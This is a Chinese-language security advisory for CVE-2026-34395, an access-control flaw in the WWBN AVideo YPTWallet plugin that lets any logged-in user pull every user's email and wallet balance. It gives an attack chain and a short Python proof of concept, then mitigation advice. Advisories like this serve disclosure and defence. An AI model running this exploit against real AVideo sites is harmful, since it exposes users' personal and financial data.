CVE-2026-34395 CVSS 6.5 中危

CVE-2026-34395 AVideo敏感信息泄露漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34395

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个广泛使用的开源视频平台。在其26.0及更早版本中，YPTWallet插件存在严重的权限验证缺失漏洞。由于users.json.php接口仅检查用户登录状态而未核查管理员权限，任何注册用户均可利用此漏洞获取全站用户的个人信息及钱包余额。鉴于目前尚无公开补丁，该漏洞对用户隐私和平台安全构成直接威胁。

技术细节

该漏洞源于WWBN AVideo平台YPTWallet插件中users.json.php文件的访问控制机制失效。代码逻辑错误地认为只要通过User::isLogged()验证即为合法访问者，忽略了对于数据敏感性的保护，未实施User::isAdmin()的权限强制检查。因此，攻击者无需具备管理员特权，仅需拥有一个有效的普通用户账号会话，即可直接向该端点发起请求。系统收到请求后，会无条件检索数据库中的用户表，并将包含用户名、邮箱、钱包余额等敏感信息以JSON格式全部返回。这属于典型的因权限校验缺失导致的信息泄露漏洞，攻击门槛极低但危害严重。

攻击链分析

STEP 1

步骤1

攻击者在目标AVideo平台注册一个普通用户账号，并成功登录获取有效的Session ID。

STEP 2

步骤2

攻击者构造HTTP请求，访问/plugin/YPTWallet/view/users.json.php端点，并在请求头中携带用户的Cookie。

STEP 3

步骤3

服务器端仅验证登录状态，未验证管理员权限，直接返回全站用户列表及钱包余额数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, session_cookie):
    """
    Exploit for CVE-2026-34395
    Fetches all user data via the vulnerable YPTWallet endpoint.
    """
    endpoint = f"{target_url}/plugin/YPTWallet/view/users.json.php"
    headers = {
        "Cookie": f"PHPSESSID={session_cookie}"
    }
    
    try:
        response = requests.get(endpoint, headers=headers)
        if response.status_code == 200:
            print("[+] Exploit successful! Leaked data:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

# Usage
# exploit("http://target-site.com", "valid_session_id")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

由于目前暂无补丁，建议管理员暂时禁用YPTWallet插件，或者在Web服务器（如Nginx、Apache）层面对/plugin/YPTWallet/view/users.json.php路径实施访问控制策略，仅允许特定IP访问，直到官方修复版本发布。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表